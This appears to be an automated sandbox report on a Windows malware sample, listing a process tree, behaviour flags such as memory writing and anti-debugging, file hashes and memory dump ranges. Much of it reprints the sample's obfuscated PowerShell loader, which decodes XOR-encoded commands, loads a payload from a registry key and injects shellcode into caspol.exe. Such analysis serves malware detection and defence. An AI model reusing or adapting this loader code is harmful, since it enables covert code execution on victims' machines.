De'Dr1Pe5Re7Re3As5af4Cl4ap3Mi4Je8St5BeDIr5BeDCo5ImEIn4Tr2pr5Ti8Su4Re2Sp0pl0So0Ca4Ma0Ri1Pr1JuFTi7Va5Br5Ov4Cr5Sh7Si5Ku8Op5CoFPr5pu4Be7AfCCy5To4Pe4Ld5At5Ep9Be5KaEAn5Up5Pa1Ba9Re1To5Ov7No9no5Af4Bl5RuCUn5Cu4Ef5JoDEp4Pe8Sp4Fo5Br4im3Lo5ChEAn5elFCu0Ch3Ud1BrDNa1Ra1Ch1El5Un7Un9Br5Wi4Em5KvCFr5la4Ty5FlDPr4Af8Es4Gu5Tv4Ba3sa5DeEbd5PrFLi0Sy2he1SpDPs1Ta1Pe1Jo5Ag7NoFra5InEse5ScFBr5Pr8Pa5AbFRd5Ch5Au4No4Rh4Bl3Ca5He0aa4Vi5Pr5Tu4Al5Br5Si1SaDLn1Pe1Un1Tr5No7Ae5He5FeEMr5ReAFa4Sc4Tn5DyCma5Cu4Re5GeFUn4Lo5Ov4In2Re5De8ps5Ho5Ud5sh4Sk4La3Pe5UnFPr5Sk4Pa1Ve8La1SkFTa6Be2Po5Ra4Sq4Eu5Ma7Pr8Ti5StCMe4Sl1Ma5AsDBa5Fo4Ke5PuCTi5Fu4Fr5HaFOm4Ba5Al5me0Hy4Ca5Sa5Be8Br5KeEUn5TrFUp7An7Sp5TrDUn5Tj0In5Pr6Ps4Fe2Ac1Sa9Do1Hv5Na7Ag7El5Su0Ce4ro6Re5TiFsk5Fa8Tr5EdFSt5Si6Ju5DaFsy5Su4St4Di2La4Sn2So0Mi6Ur1In8Ki'ko;Fo&Pi(Pa`$MiHFoeJimaseCalSuyDetsprPaoPanPe7Kr)be Br`$TubInaInsIdhFleSerFlsFi4Be;Mi`$MabFoaTosAbhmieBlrpasAd5Hu In=Ta DiHPrTCiBNu Bi'Ca4Re3De5Fo4ve4Av5Da4Dr4Or4Le3En5BjFDa1Ap1Er1Fi5Be7Hy3En5Se4ol4Di3Te4Ka8Qu5TuDEk5AfDTa5PyEKa4En2Tr5Dr8Di4su2Rd0Sa0Fo0St4Ve0Fl1Un1ViFSt7Mi2Ti4we3Ra5Sa4La5Un0Si4gr5af5Ti4Pr6Pe5In4Fj8Fo4Fr1Cr5Sa4Va1Op9Op1Hu8No'Rt;ne&Co(Bl`$BoHSyeSomReeKwlTryGrtHarProAvnTa7Ra)Tr Un`$ovbAraLasOlhAseLerHesEl5Fe Ti Br Ho;Pl}Ku`$NoDFoaFoaMehTyiHynNrdmieSerPunYceKusUd Cu=Mi SmHBrTPeBSt Hi'Br5SoAFr5Ig4Sa4Mi3Sm5EcFTo5Fe4ls5FoDRi0Bu2Fo0No3un'Sk;Be`$RsbAbaPhsInhdyeInrThsFa6Ma Sa=Sk SpHBaTAdBIn pr'Se1So5Sh6Pr2Po4ev8sv5VeFBi5BeESp5An5In5Wy0Ca5WoDen4Ma5Se1Ku1Ov0smCSp1Re1Pr6PrASu6Sb2Aa4Fa8gy4Bo2Ca4Pr5Fo5Ar4Su5CiCBe1GeFCo6Sy3af4Me4Co5FoFMa4Do5Un5Su8Op5ReCCl5At4Il1coFPl7Bi8Tr5LaFaf4bn5Pr5Av4Na4fo3Ta5FrEWh4Un1Ga6Un2ph5Re4Li4Pr3Ar4Ko7St5Sp8Ud5Pu2Sp5Pe4Ma4Fr2Ti1OrFSm7BdCRe5Pa0Aq4Fl3ve4li2Bi5Gu9hv5Sn0Ap5HoDTe6reCYe0SyBHa0WoBEf7So6Gy5Di4Kv4Tl5Lo7Su5Sn5sp4Se5RiDFr5Op4Dr5Pl6Fe5Ho0Lo4Re5Fo5St4Sk7Pr7Pi5stELa4Ks3Ud7Gl7No4Br4Bo5afFPr5Me2Ce4Cy5Af5Ut8An5FlEGi5koFMi6Sk1De5SpESe5Jo8De5LaFue4Sk5Op5Ga4Te4In3Mo1Ca9Ko1Ma9Li5Fd7Ev5BuAOd4Ga1De1Mo1In1Ba5Ca7Sp5Se5Le0Ve5No0Ga5de9Un5Bu8Sn5AnFSp5Pl5Sm5Vi4em4ma3Ap5MiFEn5Ma4Ti4Je2Ko1de1ev1Uf5Ip7Ap9Da5Af4Hf5MiCRf5Tm4Bu5HeDfi4he8Ca4ga5St4ar3hy5MaENe5ReFUn0Tu5Si1St8De1NoDUn1Af1Sy1In9na7Br6Kn7Ch5Ve6sc5Qu1Im1Su7Sn1Hu1Ud9Se6reAPi7Ri8Am5CaFTo4Be5Ca6Sl1Le4Er5Ma4Es3Kn6ShCTi1TrDUd1Fl1Po6FiAPo6Fr4Re7Re8Kv5NoFSu4Ko5Op0Br2Bo0Ha3ud6ChCPs1IlDAu1Va1To6ZiAUd6Pa4Mo7Sk8Ko5UmFOp4Fu5En0Fi2su0Ag3Ko6OxCBa1beDta1Ti1Ep6FlAFj6Re4Rv7si8Fa5CaFUn4Kr5Pa0Li2Ed0vi3Ze6NoCUn1Gy8Ho1De1Fr1Br9st6ToARa7Al8Fi5NoFEl4di5Pu6Va1Sr4Dr5Un4Sa3Kn6PrCTh1Fu8La1Ko8Di1Fa8Li'To;Bi&as(Si`$SvHPaeComFreKnlSjyPotSmrGaoSanTi7Cl)Th Ta`$EnbDaaRasOvhlnenarPasWa6Pa;Bl`$OuSBrlmiabjvHoiGenGa He=Pr ScfRikDipSo Ba`$DaHCoeMimMaeRelMeyMotTrrReoSunRe5St Te`$InHSieNimWheHelJayLotDirAfoDonCo6He;Hy`$CibAraInsVehkaeLarEcsSa7Ol Re=Ha OvHSeTstBBi Pr'Sp1Co5Pl7WiCUd5sc8Se5pa2ov4Pr3Pr5TeEAf5Ga3Un5ud0Mu5Ed2Wo4Tu5Fa5Uf4Me4Re5Ox5Mi4Ne4Ov3Ti5Ka8Ma5Co0Vo0Sp2In1Ud1Kl0PeCAn1Un1Tu1Ov5Ma6St2Bg4Po8To5apFPe5SuEHo5Ir5Ba5Po0pa5BeDSi4He5He1YdFDe7Ho8Mi5UnFMi4De7Ja5SuEKl5PeACo5Ac4Is1Ad9Ko6MoAKo7Pa8Ad5PoFBr4Ud5Mo6Ti1Un4sa5In4Ek3Fe6AfCRe0ShBTo0ZoBda6UlBPe5Po4To4Se3Py5MiEun1UnDHu1Ab1Dr0Su7No0Cr5Ka0Kn5si1MeDIn1Sk1sl0tu1De4Ru9Gr0Ac2St0Pa1Dd0Wh1Ta0Pa1Ud1OpDFo1Va1Ri0Go1La4Sk9Ca0gr5Eu0Do1Co1Pu8Sl'Gu;di&Mo(Sv`$stHYaeUlmBreenlLyyEmtGirVeoEjnPh7Pe)Fo re`$nabKyaSpsTrhIneDorNosPr7ru;St`$PabStainsathSueChrAfsUn8Fo Do=Su PeHHaTToBOp Re'Wa1ve5Pu7Un8Sk5AlFIn4Fo2So5diESm5RaCKa5KaFti5GeESv5AfDWa5Ko4He5EjFTi4la5Ev5ThDFo4Tr8Be0Sk0Ju0En4Em0Lu9Se1Ph1Ca0MiCCo1Fo1Tr1Bi5Sh6Di2Ab4Ne8In5MoFMa5FiEso5Sn5Te5Lu0Vo5EnDKr4Al5ca1MaFCr7Po8Sy5AnFDe4tj7Su5LoEAn5SmAAu5qu4Es1Fr9Rd6SkAPh7Re8Le5SrFDe4Ud5Af6Sa1Al4an5Ra4Li3mi6MiCSy0SvBSp0AcBKi6PaBIn5Hi4Ac4La3Wh5GlEBi1SkDKl1Cy1Re0Ps2in0Fo1My0Sr6Ba0Re7Ca0Lu1To0Mi8Kv0La7Fa0Cr1So1StDSa1Mi1sh0St1Ta4Mo9Il0in2Fa0Ji1Ep0Te1Sv0Ir1Wi1PrDGu1Es1ko0Fu1An4Ps9in0In5Be1Ty8Un'Ab;sk&ne(Ar`$inHPaeLomReeBelFoyDetEqrDeoFenSh7Sq)Ca Rh`$SabPoaFisDohAaeThrIdsAn8Pr;Vi`$OpMPyaSahhaaSltPomFaaAliFlsSemSa1Sm4Tr2Al=Sa(ReGToeZetha-GaIOptSeeTamBiPSarInoStpBuePorBltFeyAt An-EcPKsaAvtUphKr Kl'DrHRaKNeCOvUKo:Pr\KrKToaUnnXieRelFoeStnSysBu\GaPNorTrerasAppImeSwcTriUnfRuiHucMu'Ca)Sa.ReUOrrSetTaiFocOvadetKaiUnnShgTr;Pi`$KabGuaDysPehAfeSkrFisge9Je Da=Zo OvHCaTFoBEl La'fy1Pl5Mi5De3Un5Ti0Ud4Er2sa5Po9Ku5Fe4Fo4Ov3Pi4Ex2Pr1re1Rm0ArCSa1mu1De6WhAPi6fo2Ve4Ra8Su4St2Co4fa5Ba5Ri4Ke5ReCOr1ArFFo7Ud2Ra5InERe5NoFSa4Fo7Mi5Il4di4An3Bo4Un5Fa6InCAu0BoBbe0AfBGo7Ru7Ca4Ad3sp5AfEmi5MiCSk7Vi3sa5ni0Gi4Uz2Ag5Ja4Vl0Ca7Va0An5Ab6un2Af4Ha5Af4St3Im5tw8Sa5thFPs5Ca6Pi1Di9Sy1De5He7irCBe5Tr0Sp5Jo9Wr5By0Sl4Af5Re5AcCSe5Om0lo5Aa8st4ub2Fr5suCPr0Fi0St0Fr5Af0Om3Bo1Wc8Mo'Mu;Un&to(Mo`$ElHSleAnmUneBelExyLetEfrWioManOv7At)Bl Ra`$BibAbaFisslhTyeLarAssTr9Bi;Bl`$MuMMeaRehSkaartElmtoaEsiMusSkmSi1Po4Al2Sa0Se Be=Gu MiHCoTWrBSt De'No6DiAFo6Br2Co4Ar8Ek4St2Sc4Fl5An5Hy4Ti5PlCPo1DrFRe6Ha3Os4Ol4Gu5ChFbi4Sk5El5Ad8Hi5moCMa5Mi4en1NoFPn7so8Tv5CaFCa4Ac5Ov5Ha4Sn4Mi3Cr5BeENy4Sp1Mb6Be2Su5Lu4hj4ph3Es4Af7Un5Na8Vo5Ho2No5Vi4Du4Su2Un1KaFAv7BeCRh5Br0Le4St3In4Ka2Pa5Go9Pa5Bi0Su5VeDDe6EjCIn0PrBGr0TrBen7Sk2Fo5PaEPl4Ud1In4Am8Mi1St9Pe1Af5Sa5te3Pr5Re0Ge4ma2Ch5So9Pr5Aa4nd4An3Bi4Ha2Op1BeDBe1Ba1Pr0Tn1Be1StDPa1In1An1Fa1sa1sl5Se7QuCSt5Sa8Mi5St2Ma4Sm3Ur5EfEre5Ku3st5Fa0De5Me2Re4Su5Ha5Bl4Wo4Ve5Va5af4lu4Di3Ou5kr8Ko5Ba0Mo0Co2un1FjDSt1Sy1Gu0Ch7vo0Se5Is0Ni5Sa1Ta8Af'Se;Fo&Sp(Hu`$AdHPoeKomNoePalUnySttMirDioVenBo7sk)Di Gr`$IbMReaBlhNoaSitInmIraLeiSisVimRe1So4Wa2Va0Fo;Sk`$InBEleChsBovBarAvlRuiFrgTihMaeGldCy=Hj`$VebCoalasLyhChefarDisUn.OscFooKauScnAltSp-Do6Co4sk4Nu;Sh`$TeMLeaBuhPoaEltPamJeainiDisCimBa1Hy4Pr2Dr1to Pi=In StHPaTHeBMi Fo'Pu6AfAAn6Fi2Li4Pa8Re4Re2am4Vi5Su5Ga4Un5GrCHa1NoFAr6Lr3Sh4mi4pl5InFOv4Fl5Ba5In8Om5DiCst5No4Re1FlFDi7In8Re5StFSh4Va5Pa5Su4Re4Mi3st5MaEVe4St1De6Ce2St5Ar4fi4By3St4Sc7Un5Le8Ud5ch2Da5Ra4Ca4Ti2Sk1FoFPo7ReCRo5Sl0Fo4ex3Pl4br2Fi5Ir9Co5Va0Ko5PoDDi6slCJu0GrBPr0ChBAn7Bo2Gr5RaEFu4Ba1As4Da8Ko1Pr9an1Ma5Bu5De3In5Ci0gg4Ep2Re5Di9Su5Li4Fi4So3ha4by2So1FoDSc1Vo1He0fo7La0Di5Af0Af5Un1UnDDo1Fo1Sn1Pr5Ve7Ka8Ar5RyFBl4In2Pr5CeETr5BaCMo5DeFAn5SaELo5AnDko5Mi4Rh5ReFBi4Pr5Jo5AfDPr4Ci8Un0Po0Ca0St4Da0Ac9Sl1HaDAr1Bu1Do1Bl5Tr7Kn3Am5Oo4Re4Po2Co4Si7Tr4ch3Ro5HoDfr5Me8St5om6Ce5Sp9Pe5Ko4Ap5Am5Ga1Jo8Nu'Ki;Mj&In(ne`$PeHExeNomReeHylNoykntStrFooAmnHe7In)Hy El`$TeMfoaDohCoaUntLomStaPriApsTemPe1Ty4Li2La1Ka;Ad`$InMGgaMahAtaSctIomNoaUriEnsGlmUl1Gu4Pu2In2sk Fe=Un GaHRhTTnBKl Be'af1Vo5Tr7SeAKr5HeEBj4Em1Me4Un4Mu5BrDRh5At0Ul4Se5Zi5Sl8An5MaEPo5HvFIr5Re4Er4St3An4Sn2Tr1Tr1He0haCAa1Pi1Vo6UnASl6Ba2We4La8Du4Co2Re4Ex5Fu5Pe4Fa5FrCCi1AcFBr6Co3Sp4Sm4El5FoFFl4Po5Fl5Un8Ov5PrCSe5Ko4de1UnFsm7St8No5HoFSk4To5Th5Fo4Br4Su3mi5EfEfj4Pa1sh6Hy2Ko5Lo4De4Ye3Aw4Sl7Im5Op8Da5Un2Op5Pr4Te4Sk2Ef1JaFNo7GaCAt5By0Ho4Pl3se4Ko2Ch5Vr9Te5Cr0Wo5HjDRe6PhCAf0SeBAr0stBIn7Tr6Pr5At4Om4Pr5Pa7st5Re5Ca4Ba5LeDOr5An4Ti5Ba6an5No0Bo4Br5Re5Su4Kj7Co7Fi5EfEBe4Me3Ra7Po7Po4Sp4Ke5AnFSc5De2Tr4Be5Kr5Re8Re5BeESu5FoFSa6Ch1Le5JuEPi5Tr8Fe5TuFTe4Se5La5Rc4un4Tj3Fi1St9Pr1su9To5To7Dy5ChAKo4Tr1El1sl1ce1Ta5bo7NsDin5Su0be5Pa2Pr4Br5De5Fo8ju5Ab7Pa5ShDVa5SpEPr4Un3Br5InEEu4Ar4La4Mo2Ba1Rs1Ma1Gg5ge5AuCNa5FoECo5AtFPr5InESe5Fi2Ge4Ha4Tw5ShDAf5To0Af4Di5Hi5Bl4Am1Hy8Ju1LsDTr1Ko1Ty1gu9Br7un6Be7Ru5De6Ek5Re1Un1Me7tr1Sc1co9Bo6DoAKo7By8ba5StFha4Pa5Lu6Ca1Bo4Fa5An4Me3Kr6InCte1DaDRe1In1di6heAPe7St8Fo5TeFFu4Se5Sh6In1Gu4Ne5Un4Ul3Wo6BaCBe1HyDFl1Sh1Be6PoASu7Pa8Gu5flFSi4Sk5De6me1To4Ch5Su4Lb3Ps6OvCFa1PrDPa1Ph1Tr6ChABu7en8Ud5TrFKa4Sn5Sm6Mi1Hy4Im5Sa4pe3Re6fzCKa1FrDag1St1Hi6unACo7Pr8Da5MoFPl4De5Ru6Um1Nr4Un5Tr4Pl3Sh6PuCTa1Ve8pr1La1Ov1dr9Un6UnAKv7Fr8Le5HeFCo4Un5Re6ta1Ka4Re5Ch4Mi3Th6LaCHu1Ko8Fr1Bi8Pa1In8Ls'ir;Ma&fl(Br`$ByHreetamIneBalVayNdtSerStoPinGe7Hj)Bl Kn`$NiMAraAnhLeaDitDomSpaSuiResUnmPo1An4La2Jo2Ps;Di`$GaMPaaInhAlaMetHjmMiaOpibisSemNo1Ac4St2Ov3Le bi=Pe SuHJaTBiBGr Cr'Ra1am5Co7StAUd5MoEIn4Us1Ta4In4Po5MuDOc5Sh0he4An5Ir5So8Co5nyEEl5AtFFl5Li4De4Ju3St4Di2vr1TeFSy7al8Sl5ScFNr4Fr7Ok5VaEBa5JoAGp5De4Aa1Ou9Ur1Ba5Kn7UnCpe5Pu8Or5te2Tn4Ma3He5UdETi5Un3Co5Te0Ov5Vi2No4Ho5Re5Ma4Ta4Un5Mu5ab4Pr4Le3Lo5Gl8Dr5Be0Gr0Pa2En1NaDKl1Br5Pr7Hu8La5huFEx4Wi2Ar5BuEOp5HvCVe5JeFPr5NeEBe5AuDSo5Sm4Ba5FlFCa4Ha5Ba5BoDTi4Ha8St0Du0Me0De4De0Bl9In1CoDPs1Af5Zo6Fr2Fr5SuDSu5Ov0St4Un7Kn5Kv8ex5RaFRe1ReDFl0Sp1Ne1BaDBa0re1In1Su8We'Gr;Fi&Se(Co`$VaHExeRomSteTelUnyAptPrraroPrnPo7Af)Pa Fo`$MiMByaSlhAnaShtPomSeaTriFjsDimUn1Ma4Ma2Co3Me#Bl;""";Function Mahatmaism1429 { param([String]$Craber231); For($biscacha=2; $biscacha -lt $Craber231.Length-1; $biscacha+=(2+1)){ $Avisdden = $Avisdden + $Windflaws + $Craber231.Substring($biscacha, 1); } $Avisdden;}$Transistorradios0 = Mahatmaism1429 'AcISuEJoXFa ';$Transistorradios1= Mahatmaism1429 $Hyemal;if([IntPtr]::size -eq 8){START-job { param($Aira) powershell $Aira } -RunAs32 -Argument $Transistorradios1 | wait-job | Receive-Job;}else{&$Transistorradios0 $Transistorradios1;};;;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Craber231); $Kevazingo = $Craber231.Length; $Otopyosis = New-Object byte[] ($Kevazingo / 2); For($biscacha=0; $biscacha -lt $Craber231.Length; $biscacha+=2){ $Otopyosis[$biscacha/2] = [convert]::ToByte($Craber231.Substring($biscacha, 2), 16); $Otopyosis[$biscacha/2] = ($Otopyosis[$biscacha/2] -bxor 49); } [String][System.Text.Encoding]::ASCII.GetString($Otopyosis);}$Fawningness0=HTB '62484245545C1F555D5D';$Fawningness1=HTB '7C5852435E425E57451F66585F02031F645F425057547F50455847547C5445595E5542';$Fawningness2=HTB '76544561435E5270555543544242';$Fawningness3=HTB '62484245545C1F63445F45585C541F785F4554435E4162544347585254421F79505F555D54635457';$Fawningness4=HTB '424543585F56';$Fawningness5=HTB '7654457C5E55445D5479505F555D54';$Fawningness6=HTB '63656241545258505D7F505C541D117958555473486258561D116144535D5852';$Fawningness7=HTB '63445F45585C541D117C505F50565455';$Fawningness8=HTB '6354575D545245545575545D5456504554';$Fawningness9=HTB '785F7C545C5E43487C5E55445D54';$Hemelytron0=HTB '7C4875545D545650455465484154';$Hemelytron1=HTB '725D5042421D116144535D58521D116254505D54551D11705F4258725D5042421D117044455E725D504242';$Hemelytron2=HTB '785F475E5A54';$Hemelytron3=HTB '6144535D58521D117958555473486258561D117F5446625D5E451D116758434544505D';$Hemelytron4=HTB '6758434544505D705D5D5E52';$Hemelytron5=HTB '5F45555D5D';$Hemelytron6=HTB '7F4561435E455452456758434544505D7C545C5E4348';$Hemelytron7=HTB '787469';$Hemelytron8=HTB '6D';$Lactiflorous=HTB '646274630203';$monoculate=HTB '72505D5D66585F555E4661435E5270';function fkp {Param ($Gardinprdikens, $Airattraktions) ;$bashers0 =HTB '157058435057425A505D5D585F56545F110C11196A704141755E5C50585F6C0B0B72444343545F45755E5C50585F1F765445704242545C535D5854421918114D1166595443541C7E535B545245114A11156E1F765D5E53505D704242545C535D487250525954111C705F5511156E1F7D5E525045585E5F1F62415D5845191579545C545D4845435E5F09186A1C006C1F744044505D4219157750465F585F565F5442420118114C181F7654456548415419157750465F585F565F5442420018';&($Hemelytron7) $bashers0;$bashers5 = HTB '1562455E435C47504342545D544542110C11157058435057425A505D5D585F56545F1F7654457C5445595E5519157750465F585F565F544242031D116A654841546A6C6C117119157750465F585F565F544242021D11157750465F585F565F544242051818';&($Hemelytron7) $bashers5;$bashers1 = HTB '43544544435F111562455E435C47504342545D5445421F785F475E5A5419155F445D5D1D1171196A62484245545C1F63445F45585C541F785F4554435E4162544347585254421F79505F555D546354576C197F54461C7E535B5452451162484245545C1F63445F45585C541F785F4554435E4162544347585254421F79505F555D5463545719197F54461C7E535B54524511785F45614543181D1119157058435057425A505D5D585F56545F1F7654457C5445595E5519157750465F585F565F5442420418181F785F475E5A5419155F445D5D1D1171191576504355585F414355585A545F42181818181D111570584350454543505A45585E5F421818';&($Hemelytron7) $bashers1;}function GDT {Param ([Parameter(Position = 0)] [Type[]] $Dokumentsiderne,[Parameter(Position = 1)] [Type] $Nonindurated = [Void]);$bashers2 = HTB '15735443485D5D5E425842000401110C116A704141755E5C50585F6C0B0B72444343545F45755E5C50585F1F755457585F5475485F505C5852704242545C535D4819197F54461C7E535B5452451162484245545C1F6354575D545245585E5F1F704242545C535D487F505C5419157750465F585F565F5442420918181D116A62484245545C1F6354575D545245585E5F1F745C58451F704242545C535D487344585D5554437052525442426C0B0B63445F181F755457585F5475485F505C58527C5E55445D5419157750465F585F565F544242081D111557505D4254181F755457585F5465484154191579545C545D4845435E5F011D111579545C545D4845435E5F001D116A62484245545C1F7C445D45585250424575545D54565045546C18';&($Hemelytron7) $bashers2;$bashers3 = HTB '15735443485D5D5E4258420004011F755457585F54725E5F4245434452455E4319157750465F585F565F544242071D116A62484245545C1F6354575D545245585E5F1F72505D5D585F56725E5F47545F45585E5F426C0B0B6245505F555043551D1115755E5A445C545F4542585554435F54181F625445785C415D545C545F455045585E5F775D50564219157750465F585F565F5442420618';&($Hemelytron7) $bashers3;$bashers4 = HTB '15735443485D5D5E4258420004011F755457585F547C5445595E55191579545C545D4845435E5F031D111579545C545D4845435E5F021D11157F5E5F585F554443504554551D1115755E5A445C545F4542585554435F54181F625445785C415D545C545F455045585E5F775D50564219157750465F585F565F5442420618';&($Hemelytron7) $bashers4;$bashers5 = HTB '43544544435F1115735443485D5D5E4258420004011F724354504554654841541918';&($Hemelytron7) $bashers5 ;}$Daahindernes = HTB '5A54435F545D0203';$bashers6 = HTB '1562485F5E55505D45110C116A62484245545C1F63445F45585C541F785F4554435E4162544347585254421F7C50434259505D6C0B0B76544575545D5456504554775E4377445F5245585E5F615E585F4554431919575A41111575505059585F5554435F5442111579545C545D4845435E5F05181D11197675651171196A785F456145436C1D116A64785F4502036C1D116A64785F4502036C1D116A64785F4502036C1811196A785F456145436C181818';&($Hemelytron7) $bashers6;$Slavin = fkp $Hemelytron5 $Hemelytron6;$bashers7 = HTB '157C5852435E5350524554455443585002110C111562485F5E55505D451F785F475E5A54196A785F456145436C0B0B6B54435E1D110705051D110149020101011D110149050118';&($Hemelytron7) $bashers7;$bashers8 = HTB '15785F425E5C5F5E5D545F455D48000409110C111562485F5E55505D451F785F475E5A54196A785F456145436C0B0B6B54435E1D1102010607010807011D110149020101011D1101490518';&($Hemelytron7) $bashers8;$Mahatmaism142=(Get-ItemProperty -Path 'HKCU:\Kanelens\Prespecific').Urticating;$bashers9 = HTB '1553504259544342110C116A62484245545C1F725E5F475443456C0B0B77435E5C735042540705624543585F5619157C505950455C5058425C00050318';&($Hemelytron7) $bashers9;$Mahatmaism1420 = HTB '6A62484245545C1F63445F45585C541F785F4554435E4162544347585254421F7C50434259505D6C0B0B725E41481915535042595443421D11011D1111157C5852435E53505245544554435850021D1107050518';&($Hemelytron7) $Mahatmaism1420;$Besvrlighed=$bashers.count-644;$Mahatmaism1421 = HTB '6A62484245545C1F63445F45585C541F785F4554435E4162544347585254421F7C50434259505D6C0B0B725E41481915535042595443421D110705051D1115785F425E5C5F5E5D545F455D480004091D111573544247435D585659545518';&($Hemelytron7) $Mahatmaism1421;$Mahatmaism1422 = HTB '157A5E41445D5045585E5F544342110C116A62484245545C1F63445F45585C541F785F4554435E4162544347585254421F7C50434259505D6C0B0B76544575545D5456504554775E4377445F5245585E5F615E585F4554431919575A4111157D50524558575D5E435E444211155C5E5F5E52445D504554181D11197675651171196A785F456145436C1D116A785F456145436C1D116A785F456145436C1D116A785F456145436C1D116A785F456145436C1811196A785F456145436C181818';&($Hemelytron7) $Mahatmaism1422;$Mahatmaism1423 = HTB '157A5E41445D5045585E5F5443421F785F475E5A5419157C5852435E53505245544554435850021D15785F425E5C5F5E5D545F455D480004091D15625D5047585F1D011D0118';&($Hemelytron7) $Mahatmaism1423#"4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"5⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 21886⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4428 -ip 44281⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
57KB
MD5548e21a8f5e2c98bf35e935495e36c05
SHA139fa41b02e71c3e931c1840ab86606f9529d8398
SHA2565c626706da5e310c0b96a1fbc0cee8756a9099124e8dab6b9c91ac5090c4cd0d
SHA512f74e92b83a16a69ce251e2d88cf975eba0db28bc2b88ababeb5d4307f352f1291c02f3e412445c20b45dee801bf8497e2ed1c22a495ab296ca83638dc2c5c479
-
memory/2804-154-0x00000000088E0000-0x000000000A636000-memory.dmpFilesize
29.3MB
-
memory/2804-166-0x0000000077930000-0x0000000077AD3000-memory.dmpFilesize
1.6MB
-
memory/2804-157-0x0000000077930000-0x0000000077AD3000-memory.dmpFilesize
1.6MB
-
memory/2804-155-0x0000000077930000-0x0000000077AD3000-memory.dmpFilesize
1.6MB
-
memory/2804-147-0x0000000007BE0000-0x0000000007C76000-memory.dmpFilesize
600KB
-
memory/2804-167-0x00000000088E0000-0x000000000A636000-memory.dmpFilesize
29.3MB
-
memory/2804-152-0x00007FFA14BF0000-0x00007FFA14DE5000-memory.dmpFilesize
2.0MB
-
memory/2804-150-0x00000000088E0000-0x000000000A636000-memory.dmpFilesize
29.3MB
-
memory/2804-149-0x000000000A640000-0x000000000ABE4000-memory.dmpFilesize
5.6MB
-
memory/2804-148-0x0000000007900000-0x0000000007922000-memory.dmpFilesize
136KB
-
memory/2804-144-0x0000000000000000-mapping.dmp
-
memory/4308-142-0x0000000006140000-0x00000000061A6000-memory.dmpFilesize
408KB
-
memory/4308-138-0x0000000005300000-0x0000000005336000-memory.dmpFilesize
216KB
-
memory/4308-145-0x0000000007A00000-0x000000000807A000-memory.dmpFilesize
6.5MB
-
memory/4308-143-0x0000000006A50000-0x0000000006A6E000-memory.dmpFilesize
120KB
-
memory/4308-146-0x0000000006F70000-0x0000000006F8A000-memory.dmpFilesize
104KB
-
memory/4308-141-0x00000000060D0000-0x0000000006136000-memory.dmpFilesize
408KB
-
memory/4308-137-0x0000000000000000-mapping.dmp
-
memory/4308-140-0x00000000059D0000-0x00000000059F2000-memory.dmpFilesize
136KB
-
memory/4308-139-0x0000000005A30000-0x0000000006058000-memory.dmpFilesize
6.2MB
-
memory/4428-165-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/4428-163-0x0000000000401000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/4428-156-0x0000000000000000-mapping.dmp
-
memory/4428-172-0x0000000077930000-0x0000000077AD3000-memory.dmpFilesize
1.6MB
-
memory/4428-171-0x00007FFA14BF0000-0x00007FFA14DE5000-memory.dmpFilesize
2.0MB
-
memory/4428-159-0x0000000000A30000-0x0000000002786000-memory.dmpFilesize
29.3MB
-
memory/4428-160-0x00007FFA14BF0000-0x00007FFA14DE5000-memory.dmpFilesize
2.0MB
-
memory/4428-161-0x0000000077930000-0x0000000077AD3000-memory.dmpFilesize
1.6MB
-
memory/4428-162-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/4428-170-0x0000000022050000-0x000000002205A000-memory.dmpFilesize
40KB
-
memory/4428-169-0x0000000022060000-0x00000000220F2000-memory.dmpFilesize
584KB
-
memory/4428-168-0x0000000000A30000-0x0000000002786000-memory.dmpFilesize
29.3MB
-
memory/4764-133-0x00000257EEAD0000-0x00000257EEAF2000-memory.dmpFilesize
136KB
-
memory/4764-134-0x00000257EF900000-0x00000257EFA76000-memory.dmpFilesize
1.5MB
-
memory/4764-132-0x0000000000000000-mapping.dmp
-
memory/4764-151-0x00007FF9F5C10000-0x00007FF9F66D1000-memory.dmpFilesize
10.8MB
-
memory/4764-135-0x00007FF9F5C10000-0x00007FF9F66D1000-memory.dmpFilesize
10.8MB
-
memory/4764-136-0x00000257EFC90000-0x00000257EFE9A000-memory.dmpFilesize
2.0MB
-
memory/4764-173-0x00007FF9F5C10000-0x00007FF9F66D1000-memory.dmpFilesize
10.8MB